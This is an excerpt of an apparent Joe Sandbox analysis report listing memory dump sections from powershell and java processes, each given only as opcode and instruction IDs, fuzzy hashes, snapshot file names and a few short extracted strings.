                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f7769a7f9546574f25eb764180c8fe2c1a7c213d7f7e8bb6e38816cf3400a9c
                                                                                  • Instruction ID: ecf7288262dcfbf626a31062163c01f54c53c63289b636e8e17b9ff6b8d84384
                                                                                  • Opcode Fuzzy Hash: 8f7769a7f9546574f25eb764180c8fe2c1a7c213d7f7e8bb6e38816cf3400a9c
                                                                                  • Instruction Fuzzy Hash: A1512723B0DA960FE7A9DB1C55A1274B7D1EF96620B1801BBC28FC7193DD18EC858341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 438fb6f2ba3b17511c7508b4d317d7f2f458e464afc21c62b9bad5affde5ff0f
                                                                                  • Instruction ID: ff84eec87d5a309b7eda4d5831b1165ebc1662add9221afdc9bb21ac46d57a31
                                                                                  • Opcode Fuzzy Hash: 438fb6f2ba3b17511c7508b4d317d7f2f458e464afc21c62b9bad5affde5ff0f
                                                                                  • Instruction Fuzzy Hash: 69412832B0DA494FEBA5D76C94A16B8B7D1EF86720B1801FBD54EC7183E91DAC45C381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2376210069.00007FFD346DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd346dd000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0758dd534d05270eb1bb8e5b18750e67a79765f377bde0b727960c7b1e141ded
                                                                                  • Instruction ID: 983eea10e57c7a00d759804cf1390248b494b4e2ffc786bf6a1f4de8ff1c678e
                                                                                  • Opcode Fuzzy Hash: 0758dd534d05270eb1bb8e5b18750e67a79765f377bde0b727960c7b1e141ded
                                                                                  • Instruction Fuzzy Hash: 9141267140EFC45FE7568B29D8959923FF0EF53320B1905DFD088CB1A3D629A846C7A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57947e4ffef9ffb3aafe16107bb0f62a8c8c9482eb3b39a8cfde40475b587151
                                                                                  • Instruction ID: 7557695ba5df15696ed13b8f3380de628679aaa5bdc7eb7d5c46d3337de24856
                                                                                  • Opcode Fuzzy Hash: 57947e4ffef9ffb3aafe16107bb0f62a8c8c9482eb3b39a8cfde40475b587151
                                                                                  • Instruction Fuzzy Hash: B021067190CB4C8FDB59DBAC984A7E97BE0EB96321F04416BD048C3152D674A816CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bffc7bc66bba7c5109c4534e619d0ac6f47397883c3c0af87bd4bc773cc91b4d
                                                                                  • Instruction ID: c94f20c7b8db7c0b28599f75404265bd7081f3b43233d0027913004765a1a224
                                                                                  • Opcode Fuzzy Hash: bffc7bc66bba7c5109c4534e619d0ac6f47397883c3c0af87bd4bc773cc91b4d
                                                                                  • Instruction Fuzzy Hash: FA21F223B0DA964FE7A5DB1886B1174A6D1EF66620B5901BBD28FC71A3CD1CEC849341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 861266204abe62fc4c5b7cdfa142483b3d27fc43fdc808c3cb68914a903d99ed
                                                                                  • Instruction ID: cf92a71125785833276f19a70027954ae6920b06ebb08534083e80ad7a7aa0b6
                                                                                  • Opcode Fuzzy Hash: 861266204abe62fc4c5b7cdfa142483b3d27fc43fdc808c3cb68914a903d99ed
                                                                                  • Instruction Fuzzy Hash: 35110232B0E9854FE7A4D72C94B49B8BBD0EF86624B5900FBD55EC7092D91DAC809380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 94816e60607fb0e10e755f000ba51ea1898e434ab0ee721be112b1c0a607d8d1
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 1701677121CB0C8FD744EF0CE451AA5B7E0FF95364F10056DE58AC3655DA36E882CB45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd94538554431c24d5f81ec9d91b81a84b93d75f6278bcf8e8e548cc84793be7
                                                                                  • Instruction ID: b4d1515d4873b84dc1764d0cd7e177b144b1f450dd130e49278416f3c945749b
                                                                                  • Opcode Fuzzy Hash: bd94538554431c24d5f81ec9d91b81a84b93d75f6278bcf8e8e548cc84793be7
                                                                                  • Instruction Fuzzy Hash: 94F028B7A08A8C8FEB51DB2CA8650D57BF0FF62311B060077D648C7051DA29A848CBC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: N_^4$N_^5$N_^@$N_^N$N_^U$N_^Y
                                                                                  • API String ID: 0-3838031992
                                                                                  • Opcode ID: 000928370a00c9072ab529e96a177d9eec600aa8f3397a0338d5bfbb659d5243
                                                                                  • Instruction ID: 60e27d0a2f92c18c58e328fd64b58ca976c6979b2f0ea8296cecfa14812cd21c
                                                                                  • Opcode Fuzzy Hash: 000928370a00c9072ab529e96a177d9eec600aa8f3397a0338d5bfbb659d5243
                                                                                  • Instruction Fuzzy Hash: 3931D0A7B089265AD32276FCBCA12ED6748DF9437634502B7D39CCB143D92864CB87C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X77=
                                                                                  • API String ID: 0-3333875553
                                                                                  • Opcode ID: e296868b53ace158cf7409bdd264d126fa86fb39661ed3dcd5dcaa08364181fd
                                                                                  • Instruction ID: 90946cd1b8aec490ecb7a46f49d89efdc0228918b3a3895863ab35e9e62657e4
                                                                                  • Opcode Fuzzy Hash: e296868b53ace158cf7409bdd264d126fa86fb39661ed3dcd5dcaa08364181fd
                                                                                  • Instruction Fuzzy Hash: 03C15833B1DA8A4FEBA5AF6858A55B97BD0EF16310B4402BED54CD70A3DA1CAC06D341
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddaeb38d14cab3bb89be7b5f573f1b933cbd32bf894cfe3aac3d8a78e8223379
                                                                                  • Instruction ID: 45f0ec35c0980d53f49a7cdd5cb3dafd8a4c96198db217e3190284770df7cfd7
                                                                                  • Opcode Fuzzy Hash: ddaeb38d14cab3bb89be7b5f573f1b933cbd32bf894cfe3aac3d8a78e8223379
                                                                                  • Instruction Fuzzy Hash: 28C18331A18A4D8FDF95DF5CC4A5AAD7BF1FF59340F1441AAD409E7296CA38E881CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fab01cc8ff90c9b746ac1988f9cae6db938ec13d97cf44739b51f4a8a13e5171
                                                                                  • Instruction ID: cfbab17c11e7acdb28d140a18e62ef652ed394720246d1a52b814588474cefba
                                                                                  • Opcode Fuzzy Hash: fab01cc8ff90c9b746ac1988f9cae6db938ec13d97cf44739b51f4a8a13e5171
                                                                                  • Instruction Fuzzy Hash: 7B512723B0DA960FE7A9DB1CA4A127477D1EFA6620B1801BBC24EC7293DD1CEC458341
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 836cdef4a9e6415866349cefde5c0673d830a2912d3a316bb70ea93b45f273af
                                                                                  • Instruction ID: 7c23015f4f387f9621aef54002e082d53b642f94d6290972426703a9bd5c3851
                                                                                  • Opcode Fuzzy Hash: 836cdef4a9e6415866349cefde5c0673d830a2912d3a316bb70ea93b45f273af
                                                                                  • Instruction Fuzzy Hash: A2413933B0DA490FEBA5D76CA4A15B877D1EF66720B0800BBC55DD7183E91DAC058381
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 281b48850176694b09871bd6e96447f7c3124fd20c1e5351bd03f307fbfffa0c
                                                                                  • Instruction ID: 9bde261df4bba55179f64c0646d5a5092477d65942932b113b2bc37b7c4d2349
                                                                                  • Opcode Fuzzy Hash: 281b48850176694b09871bd6e96447f7c3124fd20c1e5351bd03f307fbfffa0c
                                                                                  • Instruction Fuzzy Hash: 6A411971A1CB484FDB589F5C984A6F97BE1FB95310F10812FE449C3292DB35A816CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2570924319.00007FFD3470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3470D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd3470d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7475b8ddcedf56f070d0440db91a76a0c817ca8e7eb2650e81391fc34e922744
                                                                                  • Instruction ID: 19fddde5a4944ecd9a8b67ff7b7f66e0f1fe0eab1d3f67e7139176e7d74f7f8b
                                                                                  • Opcode Fuzzy Hash: 7475b8ddcedf56f070d0440db91a76a0c817ca8e7eb2650e81391fc34e922744
                                                                                  • Instruction Fuzzy Hash: 1641157141EBC48FE756DB299891A523FF0EF57320B1905DFD088CB1A3D629A84AC792
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bbdaa4f21feda04447e604aadd767a74ff6f2dcdba4a18ba20e0a1be508d9687
                                                                                  • Instruction ID: 22a00587511500803ccafb13cff0d89477532262e1b6822e008c2f580743b8fb
                                                                                  • Opcode Fuzzy Hash: bbdaa4f21feda04447e604aadd767a74ff6f2dcdba4a18ba20e0a1be508d9687
                                                                                  • Instruction Fuzzy Hash: EA31473190DB8C4FDB59CFAC985A6E97FE0EF66320F0441AFD048C7163D668980ACB52
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6eadf77a1bf09ba246ccae16279beefffaf164cf39bb431adb942ffa0b0a93c2
                                                                                  • Instruction ID: 2977c9c5307f40dec6c8ad94ba7eac90b35ddc722d3a00fe625037eb3496baff
                                                                                  • Opcode Fuzzy Hash: 6eadf77a1bf09ba246ccae16279beefffaf164cf39bb431adb942ffa0b0a93c2
                                                                                  • Instruction Fuzzy Hash: C121F223B0EA964FE7A5DB1CA4B117466D1EFB6610B5900BBC64DC72A3DD1CEC849341
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6bf3a64759c962204a9f2d4f4520bbc7aef1ff2baef7a77afed58baa4d6538c6
                                                                                  • Instruction ID: 4748feca4dcd58204ce1de2c6e78e8b43628770dbe2f77e12f5bfa5c32992f51
                                                                                  • Opcode Fuzzy Hash: 6bf3a64759c962204a9f2d4f4520bbc7aef1ff2baef7a77afed58baa4d6538c6
                                                                                  • Instruction Fuzzy Hash: F131B867E0DA858BFB22AB2858A60E53BA0FF23754B0801B6C659C6053EE1D2845D782
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f7f81a43fb07d5dd8df06d33bc27c4db34f9adcfb233e41ce02773192f9832b
                                                                                  • Instruction ID: 54aad25186878cfaa3749058c03420661c7ba29592921360469784b303c63590
                                                                                  • Opcode Fuzzy Hash: 9f7f81a43fb07d5dd8df06d33bc27c4db34f9adcfb233e41ce02773192f9832b
                                                                                  • Instruction Fuzzy Hash: 39113233B0E9850FE7A4D71CA4B09B837E0EF2662074900BBD65CD7192D91DAC049380
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                  • Instruction ID: 44cdf7fc4438c66eba976bc1f3baba3b19b9efe813ebcdb5c1dc26e142bb82ee
                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                  • Instruction Fuzzy Hash: 2401677121CB0C4FD744EF0CE451AA6B7E0FB95364F10056DE58AC3665DA36E882CB45
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K_^$K_^$K_^$K_^
                                                                                  • API String ID: 0-4267328068
                                                                                  • Opcode ID: e81a73e7f0959b42b44787c8b27a45176f9774c7f71655e5b010785e9d7d9f04
                                                                                  • Instruction ID: 3363b2c97860a88cb55ca45fcef2f7d08f73a0bc33a83addad7c87fbdde47194
                                                                                  • Opcode Fuzzy Hash: e81a73e7f0959b42b44787c8b27a45176f9774c7f71655e5b010785e9d7d9f04
                                                                                  • Instruction Fuzzy Hash: 8D417263A0EAD26FEB57432848B61D57FE1EF133A4B0D06F6C289CB093ED1D1447A242
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K_^4$K_^7$K_^F$K_^J
                                                                                  • API String ID: 0-377281160
                                                                                  • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                                  • Instruction ID: 422488b4a128c87d7ed799899e943b7d349b8d6fdb90014a780e0d020a77940a
                                                                                  • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                                  • Instruction Fuzzy Hash: B62126B77089266EE7227BBCB8545DE3BA4CF9827434502B3D19CDB013E91474C68BC0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.2794671334.00007FFD348E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_7ffd348e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X7R7
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c709c34848015645b2c4fb5e8d4d4c1ba5ddd524ea91c5ddcfbadacb16ff2fbb
                                                                                  • Instruction ID: b1fe3e56972d0bbe982adc5f68ea1b23544d841b04c781575ba1647c9b76a86b
                                                                                  • Opcode Fuzzy Hash: c709c34848015645b2c4fb5e8d4d4c1ba5ddd524ea91c5ddcfbadacb16ff2fbb
                                                                                  • Instruction Fuzzy Hash: A0814B27B0891A9AE720BBBCB8611ED7B64EFC6331B1442B7D14CDB183CD286486C7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cafcad3ea748c7865a514965449728c4a92296001265811713e564635498026a
                                                                                  • Instruction ID: 65afda641dce00196917179b5f9f26d3b842c2566673e80d4a77fe3893607c90
                                                                                  • Opcode Fuzzy Hash: cafcad3ea748c7865a514965449728c4a92296001265811713e564635498026a
                                                                                  • Instruction Fuzzy Hash: 6F712A37B0991A9AE721BBBCA8611ED7BA5EF85321B1442B7D14CD7183CD286486C7D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 27e9b25495fe3c0176c8dbb538c40514c02586926d6f4a29e0bada71a766d166
                                                                                  • Instruction ID: 9ed63675a7aab6249344d45292675cd246fdb1f06ce66fd84af4999fb35da007
                                                                                  • Opcode Fuzzy Hash: 27e9b25495fe3c0176c8dbb538c40514c02586926d6f4a29e0bada71a766d166
                                                                                  • Instruction Fuzzy Hash: 9A51093370DA854FD321EBACA8B11ED7FA5AF8221475845FBD089CB2D7DD2878858781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a5a4470b4f82fc3af7b7723c3c051989128fb3828c93132d9067525ab380850
                                                                                  • Instruction ID: c036e9172fc7af8713af2379ecb117003e3024a2ff59fae9a636a74d860e2f7a
                                                                                  • Opcode Fuzzy Hash: 6a5a4470b4f82fc3af7b7723c3c051989128fb3828c93132d9067525ab380850
                                                                                  • Instruction Fuzzy Hash: 0631C621B1894D0FEBA8EB6C946A378B6D6EF99315F1405BEF40ED32D3DD68AC418340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e7a25630d277833867968c8493281b08e6a7d159b172e6bb33a6eca7388bacf5
                                                                                  • Instruction ID: 888ec61f8a308628a262be66c24e9b3a3565c04e62beaaf6d18f560a6d317a24
                                                                                  • Opcode Fuzzy Hash: e7a25630d277833867968c8493281b08e6a7d159b172e6bb33a6eca7388bacf5
                                                                                  • Instruction Fuzzy Hash: C431C222B18A4A5FEB55B7AC586A3BD77D6EF99311F0402BBE00DC3293DD2C6C418351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ea8b4f6e72521bc7bcee2e57259c74bcb2d256e71c2e1ff009839a94a928175
                                                                                  • Instruction ID: 11b1a7704f6330e25aefabcbd6c3efa33307601d5c00f67d35a0c4eea2ab76d4
                                                                                  • Opcode Fuzzy Hash: 3ea8b4f6e72521bc7bcee2e57259c74bcb2d256e71c2e1ff009839a94a928175
                                                                                  • Instruction Fuzzy Hash: 36419435B18A098FDB54EBA888656EDBBB2FF99301F5405BAD009D72D2CD386841C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed8247c069f3158531c930b073432e84bfc7cd4c55722b53d25658dc057d9755
                                                                                  • Instruction ID: bd6817c41c6c410b9f9391c6a0fac186b74998da89f2849136c4f55224ce33f0
                                                                                  • Opcode Fuzzy Hash: ed8247c069f3158531c930b073432e84bfc7cd4c55722b53d25658dc057d9755
                                                                                  • Instruction Fuzzy Hash: 7421A531758A494FD360EF6894B14AD7F76AFC5300B9844EAD009C73D7CD287C808B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2835687710.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34810000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d625831bef99301e78f2a32ade07eb976636a1145baf0d111ba9570f49eed83
                                                                                  • Instruction ID: 7894b99984e6560aa224d58dcb767b2aa5c245be4b8c6b56d03b0d6c2b7bc89b
                                                                                  • Opcode Fuzzy Hash: 6d625831bef99301e78f2a32ade07eb976636a1145baf0d111ba9570f49eed83
                                                                                  • Instruction Fuzzy Hash: F4012D14A1C7954FE745AB3858A44757FF1DBD6340B4808EBEC88D61D7D81C6985C392
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 09d5f7f4c6b8c90396e3546d8fbc6bb840ab9be1f76533149efbe51d6a4abf21
                                                                                  • Instruction ID: 739b7b84e9c9492ffbc6121244535352e3d487567bdc516d901ff41bb984746b
                                                                                  • Opcode Fuzzy Hash: 09d5f7f4c6b8c90396e3546d8fbc6bb840ab9be1f76533149efbe51d6a4abf21
                                                                                  • Instruction Fuzzy Hash: 7E32D261B28A469FE7A4FB6C84A53BD73D2FF99310F4405B9E00ED32D2DE28AC419741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 268aa434215592aa5ed1e3f8304c3a93236904d86a3f6c958c6736ffb4eaee3f
                                                                                  • Instruction ID: 74c8f90ae0fc16544b29f178eb8579e83bde9c923a26709b08bf8957571f6847
                                                                                  • Opcode Fuzzy Hash: 268aa434215592aa5ed1e3f8304c3a93236904d86a3f6c958c6736ffb4eaee3f
                                                                                  • Instruction Fuzzy Hash: 3E22C261B28A495FE7A8F76884B93BD77D2FF99310F4405B9E00EC32D2DD29AC419741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000015.00000002.2927916281.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_21_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3218b8354858e01ee7a4bafe658e734fe5e0153cdc61e0c6b0d2ff37158b5d0a
                                                                                  • Instruction ID: 22baf3ce4a8e06ed0b24bd5078cfe6e5a381e015728b43fbe892f410df81737a
                                                                                  • Opcode Fuzzy Hash: 3218b8354858e01ee7a4bafe658e734fe5e0153cdc61e0c6b0d2ff37158b5d0a
                                                                                  • Instruction Fuzzy Hash: 84511F1072E6C95FE796ABB858B42767FE5DF87229B1800FBE088C71A3DD581806C342
                                                                                  Strings
